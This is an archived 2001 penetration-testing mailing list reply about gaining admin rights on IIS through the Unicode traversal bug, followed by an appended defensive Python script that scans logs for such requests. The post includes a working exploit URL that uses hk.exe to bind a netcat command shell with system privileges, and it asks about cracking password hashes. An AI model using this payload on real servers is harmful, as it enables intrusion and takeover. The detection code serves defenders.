Penetration Testing mailing list archives
Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?
From: Renato Ettisberger <renato.ettisberger () CH PWCGLOBAL COM>
Date: Tue, 27 Mar 2001 09:47:52 +0200
Hi there,
> > As you know, there is a way to spawn a shell with admin rights on an IIS 4.0
> > with the Unicode bug.
>
> What way? Did you use CmdAsp.ASP to do that? Is it possible?
No, I use the tool hk.exe from RAZOR. With this tool, you can launch a cmd.exe with system privileges. Upload hk.exe and netcat to the server. The following URL binds a netcat server with system privileges on port 53 (this works fine on our test server IIS4.0, NT engl. Version):

http://www.target.com/msadc/..%c0%af../%c0%af../%c0%af../winnt/system32/cmd.exe?/c+c: winnt\system32\hk.exe+cmd+/c+nc.exe+"-n"+"-l"+"-v"+"-p"+53+"-e"+cmd.exe

For more information about that, see our article at: http://www.dmzsystems.com/en/articles/windows/iis/IISUnicodeBug.htm

BTW: My question is, how can I crack the password hash, when it comes in the following form:

F:0x020020000000000000000000....
V:0x00000000a800000......

regards
Renato

P.S: My English is not bad, it's horrible, but I hope you understand what I'm talking about ;-)
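Added example, not part of the original post: a log check a defender can run for the request shape quoted in the message above, where %c0%af is an overlong UTF-8 encoding of "/" that hides a "../" traversal from a check done before decoding. The function names, the simplified log layout and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Lead bytes 0xC0/0xC1 never occur in valid UTF-8: they can only begin an
# overlong two-byte form of an ASCII character (0xC0 0xAF is "/").
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")

def lenient_decode(raw: bytes) -> bytes:
    """Fold overlong two-byte sequences to ASCII, as a non-strict decoder does."""
    def fold(m):
        b0, b1 = m.group(0)
        return bytes([((b0 & 0x1F) << 6) | (b1 & 0x3F)])
    return OVERLONG.sub(fold, raw)

def inspect_uri(uri: str) -> list:
    """Return findings for one requested URI; an empty list means clean."""
    raw = unquote_to_bytes(uri)
    findings = []
    if OVERLONG.search(raw):
        findings.append("overlong-utf8")
    folded = lenient_decode(raw).replace(b"\\", b"/").lower()
    if b"../" in folded or folded.endswith(b"/.."):
        findings.append("traversal")
    if re.search(rb"/(cmd|command)\.(exe|com)", folded):
        findings.append("shell-binary")
    return findings

# Constructed sample lines in a simplified "client method uri status" layout.
SAMPLE_LOG = [
    "192.0.2.10 GET /default.asp 200",
    "192.0.2.77 GET /msadc/..%c0%af../winnt/system32/cmd.exe 200",
    "192.0.2.10 GET /caf%c3%a9/menu.asp 200",
    "192.0.2.10 GET /images/logo%20small.gif 200",
]

def scan(lines):
    """Return (client, status, findings) for requests using overlong encodings."""
    hits = []
    for line in lines:
        client, _method, uri, status = line.split()
        findings = inspect_uri(uri)
        if "overlong-utf8" in findings:
            hits.append((client, status, findings))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit logged with status 200 means the server answered the request rather than rejecting it, so those entries should be triaged first.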